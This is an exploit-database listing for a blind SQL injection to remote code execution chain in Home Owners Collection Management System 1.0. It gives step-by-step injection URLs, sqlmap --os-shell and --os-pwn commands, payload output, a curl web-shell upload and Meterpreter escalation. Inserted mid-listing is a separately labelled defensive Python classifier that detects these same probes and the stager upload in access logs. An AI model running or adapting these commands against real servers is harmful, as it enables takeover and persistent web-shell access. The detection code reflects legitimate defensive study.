## https://sploitus.com/exploit?id=PACKETSTORM:166378
# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (Blind SQLi to RCE)  
# Date: 9/03/2022  
# Exploit Author: Hejap Zairy  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Windows   
  
# Steps
# 1 - Go to: http://192.168.56.1/cwms/?p=blogs/view_blog&id=3
# 2 - Manually inject blind SQLi: http://192.168.56.1/cwms/?p=blogs/view_blog&id=3%27&&SLEEP(5)&&%271
# 3 - SQLi to RCE (r00t)
# 4 - Upload web shell
# 5 - Web shell to Meterpreter full TTY shell
  
  
  
# Blind SQLi to RCE
# Exploit
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-shell --eta --hex --dbms=mysql --technique=b   
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: p=blogs/view_blog&id=3' AND 6447=6447-- hOiz  
---  
  
# Upload Meterpreter (Metasploit)
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-pwn --eta --hex --dbms=mysql --technique=b   
or  
curl -v -F "filename=@0day_hejap.php" http://192.168.56.1/tmpukpcj.php   
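Defender-side view of the same traffic, as an added example that is not part of the advisory: it flags the two request shapes shown above (the manual SLEEP() probe and sqlmap's boolean payload) and the follow-on POST to the dropped PHP stager in combined-format access logs. The log lines are constructed, and the stager filename pattern is an assumption generalised from the advisory's tmpukpcj.php.

```python
"""Flag the blind-SQLi probes and stager upload from this advisory in access logs."""
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Syntax indicators present in the advisory's two payloads: a SLEEP() call,
# sqlmap's boolean tautology (AND n=n) and a trailing "-- " comment.
SQL_PATTERNS = [
    ("sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("tautology", re.compile(r"\band\s+(\d+)\s*=\s*\1\b", re.I)),
    ("comment", re.compile(r"--\s")),
]
# sqlmap --os-shell drops a PHP stager in the web root; the name shape is an
# assumption generalised from the advisory's example (tmpukpcj.php).
STAGER_PATH = re.compile(r"/tmp[a-z0-9]{4,8}\.php$", re.I)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def classify(line: str) -> list[str]:
    """Return detection labels for one access-log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlparse(m["target"])
    findings = []
    # view_blog expects a numeric id; anything else is a probe worth a look.
    for value in parse_qs(url.query).get("id", []):
        if not value.isdigit():
            findings.append(f"non_numeric_id={value!r}")
    # Decode the whole query string: the "&&" in the manual payload splits it
    # into fragments parse_qs drops, so the SLEEP() call only shows up here.
    decoded = unquote_plus(url.query)
    findings += [f"sql_syntax:{label}" for label, pat in SQL_PATTERNS if pat.search(decoded)]
    if m["method"] == "POST" and STAGER_PATH.search(url.path):
        findings.append(f"stager_post:{url.path}")
    return findings


SAMPLE_LOG = [  # constructed lines, modelled on the requests in the advisory
    '192.168.56.10 - - [09/Mar/2022:10:00:01 +0000] "GET /cwms/?p=blogs/view_blog&id=3 HTTP/1.1" 200 4210',
    '192.168.56.10 - - [09/Mar/2022:10:00:07 +0000] "GET /cwms/?p=blogs/view_blog&id=3%27&&SLEEP(5)&&%271 HTTP/1.1" 200 4210',
    '192.168.56.10 - - [09/Mar/2022:10:00:09 +0000] "GET /cwms/?p=blogs/view_blog&id=3%27%20AND%206447%3D6447--%20hOiz HTTP/1.1" 200 4210',
    '192.168.56.10 - - [09/Mar/2022:10:02:30 +0000] "POST /tmpukpcj.php HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "benign", "<-", line.split('"')[1])
```

A single SLEEP() probe on a 200 response is weak evidence on its own; the sequence here (quote probe, then sqlmap's tautology, then a POST to a fresh tmp*.php) is what should raise the alert.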
  
  
# Proof and Exploit:  
https://streamable.com/f07cug